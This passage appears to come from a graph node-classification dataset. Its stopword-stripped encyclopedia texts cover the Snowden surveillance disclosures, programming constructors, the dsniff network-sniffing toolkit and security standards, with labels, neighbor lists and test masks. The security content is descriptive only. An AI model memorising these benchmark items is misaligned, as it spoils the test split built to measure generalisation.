correlating patterns movement time thousands millions phone users cross paths washington post also reported gchq nsa make use location data advertising tracking files generated normal internet browsing cookies operated google known pref pinpoint targets government hacking bolster surveillance norwegian intelligence service nis cooperates nsa gained access russian targets kola peninsula civilian targets general nis provides information nsa politicians energy armament top secret memo nsa lists following years milestones norway–united states america sigint agreement norus agreement nsa considers nis one reliable partners agencies also cooperate crack encryption systems mutual targets according nsa norway made objections requests nis december 5 sveriges television reported national defence radio establishment fra conducting clandestine surveillance operation sweden targeting internal politics russia operation conducted behalf nsa receiving data handed fra swedish-american surveillance operation also targeted russian energy interests well baltic states part ukusa agreement secret treaty signed 1954 sweden united states united kingdom canada australia new zealand regarding collaboration intelligence sharing result snowden disclosures notion swedish neutrality international politics called question internal document dating year 2006 nsa acknowledged relationship sweden protected top secret level nation political neutrality specific details sweden cooperation members ukusa agreement include according documents leaked snowden special source operations nsa sharing information containing logins cookies googleprefid tailored access operations division nsa well britain gchq agency 2010 g-20 toronto summit u.s. embassy ottawa transformed security command post six-day spying operation conducted nsa closely coordinated communications security establishment canada csec goal spying operation among others obtain information international development banking reform counter trade protectionism support u.s. policy goals behalf nsa csec set covert spying posts 20 countries around world italy special collection service nsa maintains two separate surveillance posts rome milan according secret nsa memo dated september 2010 italian embassy washington d.c. targeted two spy operations nsa due concerns terrorist criminal networks may secretly communicating via computer games nsa gchq cia fbi conducting surveillance scooping data networks many online games including massively multiplayer online role-playing games mmorpgs world warcraft well virtual worlds second life xbox gaming console nsa cracked commonly used cellphone encryption technology a5/1 according classified document leaked snowden agency process encrypted a5/1 even acquired encryption key addition nsa uses various types cellphone infrastructure links carrier networks determine location cellphone user tracked visitor location registers us district court judge district columbia richard leon declared december 16 2013 mass collection metadata americans telephone records national security agency probably violates fourth amendment prohibition unreasonable searches seizures leon granted request preliminary injunction blocks collection phone data two private plaintiffs larry klayman conservative lawyer charles strange father cryptologist killed afghanistan helicopter shot 2011 ordered government destroy records gathered judge stayed action ruling pending government appeal recognizing 68-page opinion significant national security interests stake case novelty constitutional issues however federal judge william h. pauley iii new york city ruled u.s. government global telephone data-gathering system needed thwart potential terrorist attacks work everyone calls swept u.s. district judge pauley also ruled congress legally set program violate anyone constitutional rights judge also concluded telephone data swept nsa belong telephone users telephone companies ruled nsa obtains data telephone companies probes find links callers potential terrorists use data even search fourth amendment also concluded controlling precedent smith v. maryland smith bedrock holding individual legitimate expectation privacy information provided third parties judge pauley wrote american civil liberties union declared january 2 2012 appeal judge pauley ruling nsa bulk phone record collection legal government legitimate interest tracking associations suspected terrorists tracking associations require government subject every citizen permanent surveillance deputy aclu legal director jameel jaffer said statement recent years american british intelligence agencies conducted surveillance 1,100 targets including office israeli prime minister heads international aid organizations foreign energy companies european union official involved antitrust battles american technology businesses catalog high-tech gadgets software developed nsa tailored access operations tao leaked german news magazine der spiegel dating 2008 catalog revealed existence special gadgets modified capture computer screenshots usb flash drives secretly fitted radio transmitters broadcast stolen data airwaves fake base stations intended intercept mobile phone signals well many secret devices software implants listed tailored access operations tao division nsa intercepted shipping deliveries computers laptops order install spyware physical implants electronic gadgets done close cooperation fbi cia nsa officials responded spiegel reports statement said tailored access operations unique national asset front lines enabling nsa defend nation allies tao work centred computer network exploitation support foreign intelligence collection separate disclosure unrelated snowden french trésor public runs certificate authority found issued fake certificates impersonating google order facilitate spying french government employees via man-in-the-middle attacks nsa working build powerful quantum computer capable breaking types encryption effort part us 79.7 million research program known penetrating hard targets involves extensive research carried large shielded rooms known faraday cages designed prevent electromagnetic radiation entering leaving currently nsa close producing basic building blocks allow agency gain complete quantum control two semiconductor qubits quantum computer successfully built would enable nsa unlock encryption protects data held banks credit card companies retailers brokerages governments health care providers according new york times nsa monitoring approximately 100,000 computers worldwide spy software named quantum quantum enables nsa conduct surveillance computers one hand also create digital highway launching cyberattacks hand among targets chinese russian military also trade institutions within european union nyt also reported nsa access alter computers connected internet secret technology use nsa since 2008 prerequisite physical insertion radio frequency hardware spy manufacturer unwitting user technology relies covert channel radio waves transmitted tiny circuit boards usb cards inserted surreptitiously computers cases sent briefcase-size relay station intelligence agencies set miles away target technology also transmit malware back infected computer channel 4 guardian revealed existence dishfire massive database nsa collects hundreds millions text messages daily basis gchq given full access database uses obtain personal information britons exploiting legal loophole day database receives stores following amounts data database supplemented analytical tool known prefer program processes sms messages extract types information including contacts missed call alerts privacy civil liberties oversight board report mass surveillance released january 23 2014 recommends end bulk telephone metadata i.e. bulk phone records – phone numbers dialed call times durations call content collection – collection program create special advocate involved cases fisa court judge release future past fisc decisions involve novel interpretations fisa significant questions law technology compliance according joint disclosure new york times guardian propublica nsa gchq begun working together collect store data dozens smartphone application software 2007 latest 2008 gchq report leaked snowden asserts anyone using google maps smartphone working support gchq system nsa gchq traded recipes various purposes grabbing location data journey plans made target uses google maps vacuuming address books buddy lists phone logs geographic data embedded photos posted mobile versions numerous social networks facebook flickr linkedin twitter services separate 20-page report dated 2012 gchq cited popular smartphone game angry birds example application could used extract user data taken together forms data collection would allow agencies collect vital information user life including home country current location geolocation age gender zip code marital status income ethnicity sexual orientation education level number children etc gchq document dated august 2012 provided details squeaky dolphin surveillance program enables gchq conduct broad real-time monitoring various social media features social media traffic youtube video views like button facebook blogspot/blogger visits without knowledge consent companies providing social media features agency squeaky dolphin program collect analyze utilize youtube facebook blogger data specific situations real time analysis purposes program also collects addresses billions videos watched daily well user information analysis purposes 2009 united nations climate change conference copenhagen nsa five eyes partners monitored communications delegates numerous countries done give policymakers negotiating advantage communications security establishment canada csec tracking canadian air passengers via free wi-fi services major canadian airport passengers exited airport terminal continued tracked showed wi-fi locations across canada csec document dated may 2012 agency described gained access two communications systems 300,000 users order pinpoint specific imaginary target operation executed behalf nsa trial run test new technology capable tracking target makes occasional forays cities/regions technology subsequently shared canada five eyes partners – australia new zealand britain united states according research süddeutsche zeitung tv network ndr mobile phone former german chancellor gerhard schröder monitored 2002 onwards reportedly government opposition military intervention iraq source latest information document leaked edward snowden document containing information national sigint requirement list nsrl previously interpreted referring angela merkel mobile however süddeutsche zeitung ndr claim confirmation nsa insiders surveillance authorisation pertains individual political post – 2002 still held schröder according research two media outlets schröder placed number 388 list contains names persons institutions put surveillance nsa gchq launched cyber-attack activist network anonymous using denial-of-service attack dos shut chatroom frequented network members spy attack dubbed rolling thunder conducted gchq unit known joint threat research intelligence group jtrig unit successfully uncovered true identities several anonymous members nsa section 215 bulk telephony metadata program seeks stockpile records calls made u.s. collecting less 30 percent americans call records inability keep pace explosion cellphone use according washington post controversial program permits nsa warrant granted secret foreign intelligence surveillance court record numbers length location every call participating carriers intercept reported u.s. government using primarily nsa surveillance target people drone strikes overseas report intercept author detail flawed methods used locate targets lethal drone strikes resulting deaths innocent people according washington post nsa analysts collectors i.e nsa personnel controls electronic surveillance equipment use nsa sophisticated surveillance capabilities track individual targets geographically real time drones tactical units aimed weaponry targets take unnamed us law firm reported mayer brown targeted australia asd according snowden documents asd offered hand intercepted communications nsa allowed government authorities able continue cover talks providing highly useful intelligence interested us customers nsa gchq documents revealed anti-secrecy organization wikileaks activist groups targeted government surveillance criminal prosecution particular ip addresses visitors wikileaks collected real time us government urged allies file criminal charges founder wikileaks julian assange due organization publication afghanistan war logs wikileaks organization designated malicious foreign actor quoting unnamed nsa official germany bild sonntag reported whilst president obama order stop spying merkel obeyed focus shifted bugging leading government business figures including interior minister thomas de maiziere close confidant merkel caitlin hayden security adviser president obama quoted newspaper report saying us made clear gathers intelligence exactly way states intercept reveals government agencies infiltrating online communities engaging false flag operations discredit targets among people nothing terrorism national security threats two main tactics currently used injection sorts false material onto internet order destroy reputation targets use social sciences techniques manipulate online discourse activism generate outcomes considers desirable guardian reported britain surveillance agency gchq aid national security agency intercepted stored webcam images millions internet users suspected wrongdoing surveillance program codenamed optic nerve collected still images yahoo webcam chats one image every five minutes bulk saved agency databases agency discovered surprising number people use webcam conversations show intimate parts body person estimating 3 11 yahoo webcam imagery harvested gchq contains undesirable nudity nsa built infrastructure enables covertly hack computers mass scale using automated systems reduce level human oversight process nsa relies automated system codenamed turbine essence enables automated management control large network implants form remotely transmitted malware selected individual computer devices bulk tens thousands devices quoted intercept turbine designed allow current implant network scale large size millions implants creating system automated control implants groups instead individually nsa shared many files use implants counterparts so-called five eyes surveillance alliance – united kingdom canada new zealand australia among things due turbine control implants nsa capable turbine implants linked relies upon large network clandestine surveillance sensors nsa installed locations across world including agency headquarters maryland eavesdropping bases used agency misawa japan menwith hill england codenamed turmoil sensors operate sort high-tech surveillance dragnet monitoring packets data sent across internet turbine implants exfiltrate data infected computer systems turmoil sensors automatically identify data return nsa analysis targets communicating turmoil system used send alerts tips turbine enabling initiation malware attack identify surveillance targets nsa uses series data selectors flow across internet cables selectors include email addresses ip addresses unique cookies containing username identifying information sent user computer websites google facebook hotmail yahoo twitter unique google advertising cookies track browsing habits unique encryption key fingerprints traced specific user computer ids sent across internet windows computer crashes updates cia accused u.s. senate intelligence committee chairwoman dianne feinstein spying stand-alone computer network established committee investigation allegations cia abuse george w. bush-era detention interrogation program voice interception program codenamed mystic began 2009 along retro short retrospective retrieval retro voice audio recording buffer allows retrieval captured content 30 days past mystic program capable recording 100 percent foreign country telephone calls enabling nsa rewind review conversations 30 days relating metadata capability store 30 days recorded conversations mystic enables nsa pull instant history person movements associates plans march 21 le monde published slides internal presentation communications security establishment canada attributed piece malicious software french intelligence csec presentation concluded list malware victims matched french intelligence priorities found french cultural reference malware code including name babar popular french children character developer name titi french telecommunications corporation orange s.a. shares call data french intelligence agency dgse hands intercepted data gchq nsa spied chinese technology company huawei huawei leading manufacturer smartphones tablets mobile phone infrastructure wlan routers installs fiber optic cable according der spiegel kind technology … decisive nsa battle data supremacy nsa operation named shotgiant able access huawei email archive source code huawei communications products us government longstanding concerns huawei may independent people liberation army chinese government might use equipment manufactured huawei conduct cyberespionage cyberwarfare goals nsa operation assess relationship huawei pla learn chinese government plans use information huawei spy huawei customers including iran afghanistan pakistan kenya cuba former chinese president hu jintao chinese trade ministry banks well telecommunications companies also targeted nsa intercept published document nsa employee discussing build database ip addresses webmail facebook accounts associated system administrators nsa gain access networks systems administer end march 2014 der spiegel intercept published based series classified files archive provided reporters nsa whistleblower edward snowden articles related espionage efforts gchq nsa germany british gchq targeted three german internet firms information internet traffic passing internet exchange points important customers german internet providers technology suppliers well future technical trends business sector company employees nsa granted foreign intelligence surveillance court authority blanket surveillance germany people institutions regardless whether affected suspected committed offense without individualized court order specifying march 7 2013 addition germany chancellor angela merkel listed surveillance search machine database named nymrod along 121 others foreign leaders intercept wrote nsa uses nymrod system 'find information relating targets would otherwise tough track according internal nsa documents nymrod sifts secret reports based intercepted communications well full transcripts faxes phone calls communications collected computer systems 300 'cites merkel listed available intelligence reports transcripts nsa operatives read towards end april edward snowden said united states surveillance agencies spy americans anyone else world contrary anything said government point article published ars technica shows nsa tailored access operations tao employees intercepting cisco router intercept wikileaks revealed information countries communications collected part mystic surveillance program may 19 intercept reported nsa recording archiving nearly every cell phone conversation bahamas system called somalget subprogram mystic mass surveillance occurring without bahamian government permission aside bahamas intercept reported nsa interception cell phone metadata kenya philippines mexico fifth country name due credible concerns could lead increased violence wikileaks released statement may 23 claiming afghanistan unnamed nation statement responding revelations nsa said implication nsa foreign intelligence collection arbitrary unconstrained false global surveillance operations nsa exploits flood images included emails text messages social media videoconferences communications harvest millions images images used nsa sophisticated facial recognition programs track suspected terrorists intelligence targets vodafone revealed secret wires allowed government agencies direct access networks access require warrants direct access wire often equipment locked room six countries vodafone operates law requires telecommunication companies install access allows governments vodafone name countries case governments retaliated imprisoning staff shami chakrabarti liberty said governments access phone calls flick switch unprecedented terrifying snowden revealed internet already treated fair game bluster well wearing pretty thin – analogue laws need digital overhaul vodafone published first law enforcement disclosure report june 6 2014 vodafone group privacy officer stephen deadman said pipes exist direct access model exists making call end direct access means government agencies obtaining people communication data without official warrant external visibility receive demand push back agency fact government issue piece paper important constraint powers used gus hosein director privacy international said never thought telcos would complicit brave step vodafone hopefully telcos become brave disclosure need braver fighting back illegal requests laws above-top-secret documentation covert surveillance program named overseas processing centre 1 opc-1 codenamed circuit gchq published register based documents leaked edward snowden gchq taps undersea fiber optic cables via secret spy bases near strait hormuz yemen bt vodafone implicated danish newspaper dagbladet information intercept revealed june 19 2014 nsa mass surveillance program codenamed rampart-a rampart-a 'third party countries tap fiber optic cables carrying majority world electronic communications secretly allowing nsa install surveillance equipment fiber-optic cables foreign partners nsa turn massive amounts data like content phone calls faxes e-mails internet chats data virtual private networks calls made using voice ip software like skype nsa return partners receive access nsa sophisticated surveillance equipment spy mass data flows territory among partners participating nsa mass surveillance program denmark germany week july 4 31-year-old male employee germany intelligence service bnd arrested suspicion spying united states employee suspected spying german parliamentary committee investigating nsa spying scandal former nsa official whistleblower william binney spoke centre investigative journalism conference london according binney least 80 audio calls metadata recorded stored us nsa lies stores also stated majority fiber optic cables run u.s. accident allows us view communication coming washington post released review cache provided snowden containing roughly 160,000 text messages e-mails intercepted nsa 2009 2012 newspaper concluded nine ten account holders whose conversations recorded agency intended surveillance targets caught net agency cast somebody else analysis post also noted many account holders americans july 9 soldier working within germany federal ministry defence bmvg fell suspicion spying united states result july 4 case one german government expelled cia station chief germany july 17 july 18 former state department official john tye released editorial washington post highlighting concerns data collection executive order 12333 tye concerns rooted classified material access state department though publicly released classified materials intercept reported nsa secretly providing data nearly two dozen u.s. government agencies 'google-like search engine called icreach database intercept reported accessible domestic law enforcement agencies including fbi drug enforcement administration built contain 850 billion metadata records phone calls emails cellphone locations text messages based documents obtained snowden intercept reported nsa gchq broken internal computer network gemalto stolen encryption keys used sim cards later 2010. company world largest manufacturer sim cards making two billion cards year keys intelligence agencies could eavesdrop cell phones without knowledge mobile phone operators foreign governments new zealand herald partnership intercept revealed new zealand government used xkeyscore spy candidates position world trade organization director general also members solomon islands government january 2015 dea revealed collecting metadata records telephone calls made americans 116 countries linked drug trafficking dea program separate telephony metadata programs run nsa april usa today reported dea data collection program began 1992 included telephone calls united states canada mexico current former dea officials described program precursor nsa similar programs dea said program suspended september 2013 review nsa programs ultimately terminated snowden provided journalists intercept gchq documents regarding another secret program karma police calling world biggest data mining operation formed create profiles every visible internet user browsing habits 2009 stored 1.1 trillion web browsing sessions 2012 recording 50 billion sessions per day 2017 disclosures wikileaks dubbed vault7 disclosure provided impetus creation social movements mass surveillance restore fourth actions like stop watching us day fight back legal front electronic frontier foundation joined coalition diverse groups filing suit nsa several human rights organizations urged obama administration prosecute protect whistleblower snowden amnesty international human rights watch transparency international index censorship among others economic front several consumer surveys registered drop online shopping banking activity result snowden revelations domestically president barack obama claimed spying americans white house press secretary jay carney asserted surveillance programs revealed snowden authorized congress international front u.s. attorney general eric holder stated target even foreign persons overseas without valid foreign intelligence purpose prime minister david cameron warned journalists n't demonstrate social responsibility difficult government stand back act deputy prime minister nick clegg emphasized media absolutely defend principle secrecy intelligence agencies foreign secretary william hague claimed take great care balance individual privacy duty safeguard public uk national security hague defended five eyes alliance reiterated british-u.s. intelligence relationship must endangered saved many lives former prime minister tony abbott stated every australian governmental agency every australian official home abroad operates accordance law abbott criticized australian broadcasting corporation unpatriotic due reporting documents provided snowden abbott described traitor foreign minister julie bishop also denounced snowden traitor accused unprecedented treachery bishop defended five eyes alliance reiterated australian–u.s intelligence relationship must endangered saves lives july 2013 chancellor angela merkel defended surveillance practices nsa described united states truest ally throughout decades nsa surveillance merkel revealed however chancellor compared nsa stasi according guardian berlin using controversy nsa spying leverage enter exclusive five eyes alliance interior minister hans-peter friedrich stated americans take data privacy concerns seriously testifying german parliament friedrich defended nsa surveillance cited five terrorist plots german soil prevented nsa however april 2014 another german interior minister criticized united states failing provide sufficient assurances germany reined spying tactics thomas de maiziere close ally merkel told der spiegel u.s. intelligence methods may justified large extent security needs tactics excessive over-the-top minister foreign affairs carl bildt defended fra described surveillance practices national necessity minister defence karin enström said sweden intelligence exchange countries critical security intelligence operations occur within framework clear legislation strict controls parliamentary oversight interior minister ronald plasterk apologized incorrectly claiming nsa collected 1.8 million records metadata netherlands plasterk acknowledged fact dutch intelligence services collected records transferred nsa danish prime minister helle thorning-schmidt praised american intelligence agencies claiming prevented terrorist attacks denmark expressed personal belief danish people grateful americans surveillance later claimed danish authorities basis assuming american intelligence agencies performed illegal spying activities towards denmark danish interests july 2013 german government announced extensive review germany intelligence services august 2013 u.s. government announced extensive review u.s. intelligence services october 2013 british government announced extensive review british intelligence services december 2013 canadian government announced extensive review canada intelligence services january 2014 u.s. president barack obama said sensational way disclosures come often shed heat light critics sean wilentz claimed nsa acted far responsibly claims made leakers publicized press wilentz view leakers gone far beyond justifiably blowing whistle abusive programs addition alarmism u.s. domestic surveillance many snowden documents released thus far nothing whatsoever domestic surveillance edward lucas former moscow bureau chief economist agreed asserting snowden revelations neatly suspiciously fits interests one country russia citing masha gessen statement russian propaganda machine gotten much mileage us citizen since angela davis murder trial 1971 bob cesca objected new york times failing redact name nsa employee specific location al qaeda group targeted series slides paper made publicly available russian journalist andrei soldatov argued snowden revelations negative consequences internet freedom russia russian authorities increased surveillance regulation pretext protecting privacy russian users snowden name invoked russian legislators supported measures forcing platforms google facebook twitter gmail youtube locate servers russian soil install sorm black boxes servers russian authorities could control soldatov also contended result disclosures international support national governments take powers organizations involved coordinating internet global architectures grown could lead balkanization internet restricted free access information montevideo statement future internet cooperation issued october 2013 icann organizations warned internet fragmentation national level expressed strong concern undermining trust confidence internet users globally due recent revelations late 2014 freedom house said ome states using revelations widespread surveillance u.s. national security agency nsa excuse augment monitoring capabilities frequently little oversight often aimed political opposition human rights activists",
    "neighbors": [
      9732,
      517,
      3088,
      9233,
      4118,
      8726,
      3629,
      8750,
      1589,
      1083,
      5180,
      10303,
      11335,
      2634,
      2636,
      7759,
      3154,
      8276,
      91,
      5216,
      2148,
      10859,
      5229,
      10867,
      5749,
      3703,
      1169,
      2208,
      4771,
      8356,
      1189,
      9900,
      10417,
      10935,
      7354,
      5308,
      6343,
      6344,
      7887,
      208,
      1251,
      3299,
      3305,
      4863,
      2818,
      3843,
      8978,
      7965,
      10525,
      8998,
      297,
      9517,
      1838,
      7983,
      5435,
      321,
      4937,
      6474,
      11089,
      2901,
      7510,
      2906,
      7515,
      5986,
      5479,
      2409,
      3433,
      3948,
      8560,
      2419,
      8564,
      6005,
      8567,
      2428,
      10620,
      2432,
      6017,
      3462,
      1930,
      1440,
      4001,
      3495,
      8104,
      1986,
      10697,
      7119,
      8664,
      9688,
      8156,
      991,
      7137,
      7145,
      1515,
      7151,
      4595,
      4086,
      6136,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7894,
    "label": 9,
    "text": "Constructor_(object-oriented_programming):constructor object-oriented programming class-based object-oriented programming constructor abbreviation ctor special type subroutine called create object prepares new object use often accepting arguments constructor uses set required member variables constructor resembles instance method differs method explicit return type implicitly inherited usually different rules scope modifiers constructors often name declaring class task initializing object data members establishing invariant class failing invariant invalid properly written constructor leaves resulting object valid state immutable objects must initialized constructor languages allow overloading constructor one constructor class differing parameters languages take consideration special types constructors constructors concretely use single class create objects return new instance class abstracted factories also create objects various ways using multiple classes different allocation schemes object pool constructors take least one argument termed parameterized constructors.when object declared parameterized constructor initial values passed arguments constructor function normal way object declaration may work constructors called explicitly implicitly method calling constructor implicitly also called shorthand method.if want initialize fields class values use parameterized constructor programmer supply constructor instantiable class java compiler inserts default constructor code behalf constructor known default constructor would find source code java file would inserted code compilation exists .class file.the behavior default constructor language dependent may initialize data members zero values may nothing all.in java default constructor refer nullary constructor automatically generated compiler constructors defined class absence programmer-defined constructors e.g java.the default constructor implicitly calls superclass nullary constructor executes empty body fields left initial value 0 integer types 0.0 floating-point types false boolean type null reference types like c++ java also supports copy constructor unlike c++ java ’ create default copy constructor ’ write copy constructors define actions performed compiler copying class objects copy constructor one formal parameter type class parameter may reference object used create copy existing object class even though classes counts conversion constructor copy constructors usually abbreviated copy ctor cctor nothing class constructors used .net using abbreviation conversion constructors provide means compiler implicitly create object belonging one class based object different type constructors usually invoked implicitly convert arguments operands appropriate type may also called explicitly c++ move constructors take value reference object class used implement ownership transfer parameter object resources java c vb .net constructor creates reference type objects special memory structure called heap value types int double etc created sequential structure called stack vb .net c also allow use new operator create value type objects value type objects created stack regardless whether operator used c++ objects created stack constructor invoked without new operator created heap constructor invoked new operator stack objects deleted implicitly go scope heap objects must deleted implicitly destructor explicitly using delete operator java constructors differ methods java constructors perform following tasks following order java permit users call one constructor another constructor using codice_21 keyword codice_21 must first statement java provides access superclass constructor codice_23 keyword constructor taking zero number arguments called no-arguments no-arg constructor es6 javascript direct constructors like many programming languages written instantiated equivalent es6 creating function instantiates object instantiated way visual basic .net constructors use method declaration name codice_4 example c constructor c static constructor static data initializer static constructors also called class constructors since actual method generated name .cctor often also called cctors static constructors allow complex static variable initialization static constructors called implicitly class first accessed call class static constructor call triggers static constructor execution static constructors thread safe implement singleton pattern used generic programming class static constructors called every new generic instantiation one per type static variables instantiated well c++ name constructor name class returns nothing parameters like member function constructor functions usually declared public section also declared protected private sections user wants restrict access constructor two parts first initializer list follows parameter list method body starts colon entries comma-separated initializer list required offers opportunity provide values data members avoid separate assignment statements initializer list required const reference type data members members parameterless constructor logic assignments occur according order data members declared even order initializer list different second part body normal method body enclosed curly brackets c++ allows one constructor constructors must different parameters additionally constructors contain parameters given default values must adhere restriction parameters given default value situation matters default constructor constructor base class base classes also called derived class constructor functions inherited addresses referenced memory allocation required new delete operators called implicitly copy constructor parameter type passed const reference example vector const vector rhs provided explicitly compiler uses copy constructor member variable simply copies values case primitive types default implementation efficient class dynamically allocated members handles resources lead double calls delete double release resources upon destruction example invocations returning objects functions passing objects value objects copy constructor called implicitly unless return value optimization applies c++ implicitly generates default copy constructor call copy constructors base classes member variables unless programmer provides one explicitly deletes copy constructor prevent cloning one base classes member variables copy constructor deleted accessible private cases calling customized copy constructor e.g reference counting deep copy pointers also require customizing destructor copy assignment operator commonly referred rule three f constructor include codice_25 codice_26 statements defined class codice_25 statements define private fields codice_26 statements execute code additional constructors defined using codice_17 keyword eiffel routines initialize new objects called creation procedures creation procedures following traits although object creation involves subtleties creation attribute typical declaration codice_30 expressed creation instruction codice_31 consists following sequence steps first snippet class codice_35 defined procedure codice_33 coded keyword codice_37 keyword codice_38 introduces list procedures used initialize instances case list includes codice_39 procedure empty implementation inherited class codice_40 codice_33 procedure coded within class second snippet class client codice_35 declarations codice_43 codice_44 type codice_35 procedural code codice_43 created origin 0.0 0.0 creation procedure specified procedure codice_39 inherited class codice_40 used line could coded codice_49 procedures named creation procedures used instruction codice_38 keyword next creation instruction codice_44 providing initial values codice_44 coordinates third instruction makes ordinary instance call codice_33 procedure reinitialize instance attached codice_44 different values cfml uses method named 'codice_14 constructor method cheese.cfc create instance cheese since coldfusion 10 cfml also supported specifying name constructor method object pascal constructor similar factory method syntactic difference regular methods keyword codice_11 front name instead codice_57 codice_58 name though convention codice_12 prefix codice_60 creating instance class works like calling static method class codice_61 perl programming language version 5 default constructors factory methods methods create return object concretely meaning create return blessed reference typical object reference hash though rarely references types used convention constructor named new though allowed name otherwise multiple constructors example person class may constructor named new well constructor new_from_file reads file person attributes new_from_person uses another person object template moose object system perl boilerplate left default new created attributes specified well whether set reset required addition extra constructor functionality included build method moose generated constructor call checked arguments buildargs method specified handle constructor arguments hashref key value form cases person class instiated like perl 6 even boilerplate left given default new method inherited attributes specified well whether set reset required addition extra constructor functionality included build method get called allow custom initialization tweak method specified post-process attributes already implicitly initialized person class instantiated like alternatively named parameters specified using colon-pair syntax perl 6 set variables names identical named parameters use shortcut use name variable named parameter php version 5 constructor method named codice_62 notice double underscore keyword codice_17 automatically calls creating object usually used automatically perform initializations property initializations constructors also accept arguments case codice_17 statement written also need send constructor arguments parameters python constructors defined one codice_5 codice_6 methods new instance created calling class function calls codice_5 codice_6 methods constructor method defined class next one found class method resolution order called typical case codice_6 method need defined common exception immutable objects classes normally act factories new instances class callable object like function call constructor calling class returns instance class however codice_5 method permitted return something instance class specialised purposes case codice_6 invoked ruby constructors created defining method called codice_72 method executed initialize new instance ocaml one constructor parameters defined right class name used initialize instance variables accessible throughout class anonymous hidden method called codice_73 allows evaluate expression immediately object built",
    "neighbors": [
      2048,
      3076,
      4101,
      3462,
      8582,
      9482,
      1931,
      6414,
      10510,
      6160,
      5521,
      9490,
      3736,
      155,
      9245,
      5796,
      5677,
      5806,
      9008,
      7219,
      3765,
      7479,
      2617,
      10043,
      10555,
      10684,
      1470,
      963,
      5316,
      8644,
      5961,
      1610,
      1611,
      9804,
      333,
      8397,
      11212,
      5330,
      11219,
      5588,
      7894,
      380,
      4057,
      10586,
      8289,
      4069,
      10470,
      7144,
      3562,
      7274,
      8554,
      2029,
      6640,
      10097,
      1016,
      3577,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 7895,
    "label": 4,
    "text": "DSniff:dsniff dsniff set password sniffing network traffic analysis tools written security researcher startup founder dug song parse different application protocols extract relevant information dsniff filesnarf mailsnarf msgsnarf urlsnarf webspy passively monitor network interesting data passwords e-mail files etc. arpspoof dnsspoof macof facilitate interception network traffic normally unavailable attacker e.g. due layer-2 switching sshmitm webmitm implement active man-in-the-middle attacks redirected ssh https sessions exploiting weak bindings ad-hoc pki applications sniff usernames passwords web pages visited contents email etc dsniff name implies network sniffer also used disrupt normal behavior switched networks cause network traffic hosts network segment visible traffic involving host dsniff running handles ftp telnet smtp http pop poppass nntp imap snmp ldap rlogin rip ospf pptp ms-chap nfs vrrp yp/nis socks x11 cvs irc aim icq napster postgresql meeting maker citrix ica symantec pc anywhere nai sniffer microsoft smb oracle sql*net sybase microsoft sql protocols name dsniff refers package well included tool dsniff tool decodes passwords sent cleartext across switched unswitched ethernet network man page explains song wrote dsniff honest intentions audit network demonstrate insecurity cleartext network protocols requests please abuse software files configured dsniff folder /etc/dsniff/ man page dsniff explains flags learn using dsniff explore linux man page list descriptions various dsniff programs text belong dsniff “ readme ” written author dug song",
    "neighbors": [
      1668,
      3218,
      5397,
      11030,
      10905,
      5405,
      1064,
      1580,
      10924,
      7983,
      9909,
      8504,
      3133,
      6083,
      7364,
      842,
      9939,
      8539,
      9440,
      10340,
      5990,
      11112,
      7411,
      2292,
      6013,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 7896,
    "label": 9,
    "text": "Vax_Common_Lisp:vax common lisp vax lisp implementation common lisp vms ultrix 32-bit vaxs first common lisp written non-lisp machines initially boot-strapped carnegie mellon university spice lisp recompiling output vax machine instruction use large vax stack original developers came cmu features included development never-released v4.0 product sold lucid inc",
    "neighbors": [
      4865,
      2438,
      9865,
      8973,
      2062,
      9877,
      4122,
      1448,
      9128,
      4779,
      5040,
      8883,
      6969,
      7867,
      8258,
      8771,
      4550,
      11083,
      8908,
      1613,
      9299,
      11604,
      1365,
      2392,
      6493,
      3176,
      2667,
      4606
    ],
    "mask": "None"
  },
  {
    "node_id": 7897,
    "label": 3,
    "text": "European_Interoperability_Framework:european interoperability framework european interoperability framework eif set recommendations specify administrations businesses citizens communicate within european union across member state borders eif 1.0 issued interoperable delivery european egovernment services public administrations businesses citizens programme idabc eif continues new isa programme replaced idabc programme 31 december 2009 eif effect enterprise architecture framework targeted largest possible scale designed promote integration spanning multiple sovereign nation states specifically eu member states examples enterprise architecture frameworks designed operate different levels scale see also alternative enterprise architecture frameworks eif version 1.0 published november 2004 non-technology obstacles stand way greater eif adoption include facts eu member states currently differ widely terms draft version 2 eif subject political debate main technology/commercial issues relate role lobbying proprietary software eif 2 adopted european commission annex ii eif european interoperability framework communication “ towards interoperability european public services ” 16 december 2010 23 march 2017 isa2 programme released new version eif version dropped version numbers simply called 'new eif include policy changes past years",
    "neighbors": [
      11164,
      2948,
      5005,
      3375
    ],
    "mask": "None"
  },
  {
    "node_id": 7898,
    "label": 4,
    "text": "BS_7799:bs 7799 bs 7799 standard originally published bsi group bsi 1995 written united kingdom government department trade industry dti consisted several parts first part containing best practices information security management revised 1998 lengthy discussion worldwide standards bodies eventually adopted iso iso/iec 17799 information technology code practice information security management 2000 iso/iec 17799 revised june 2005 finally incorporated iso 27000 series standards iso/iec 27002 july 2007 second part bs 7799 first published bsi 1999 known bs 7799 part 2 titled information security management systems specification guidance use bs 7799-2 focused implement information security management system isms referring information security management structure controls identified bs 7799-2 later became iso/iec 27001 2002 version bs 7799-2 introduced plan-do-check-act pdca deming quality assurance model aligning quality standards iso 9000 bs 7799 part 2 adopted iso iso/iec 27001 november 2005 bs 7799 part 3 published 2005 covering risk analysis management aligns iso/iec 27001",
    "neighbors": [
      3552,
      9184,
      3447,
      6360,
      383
    ],
    "mask": "None"
  },
  {
    "node_id": 7899,
    "label": 4,
    "text": "RSA_Conference:rsa conference rsa conference series security conferences approximately 45,000 people attend one conferences year founded 1991 small cryptography conference rsa conferences take place united states europe asia united arab emirates year conference also hosts educational professional networking awards programs name rsa refers public-key encryption technology developed rsa data security inc. founded 1982 abbreviation stands rivest shamir adleman inventors technique idea first rsa conference conceived 1991 phone call rsa security ceo jim bidzos executive director electronic privacy information center first conference one panel called des dss standards choice focused attendees adopt dss standard expected challenge rsa security status de facto standard digital signatures event steadily grew 1993 attracted 200 attendees known many years rsa data security conference eventually became rsa conference time conference grew business-oriented older demographic vendors led competitive issues time 1990s european competitors rsa security sometimes could get booth hired people pass flyers rsa conference encouraging attendees visit hotels nearby 1995 conference criticized clipper chip implemented chip would given u.s. government direct access evidence telecommunications devices chip installed conference put posters sink clipper big letters 1997 conference grown 2,500 attendees first european rsa conference took place 2000 started 5 tracks according network world conference focus expanded cryptography broader security conference larger attendance 2005 microsoft ceo bill gates keynote presentation according bidzos purpose conference became kinds things drive standards organize opposition government policies promote rsa name give customers 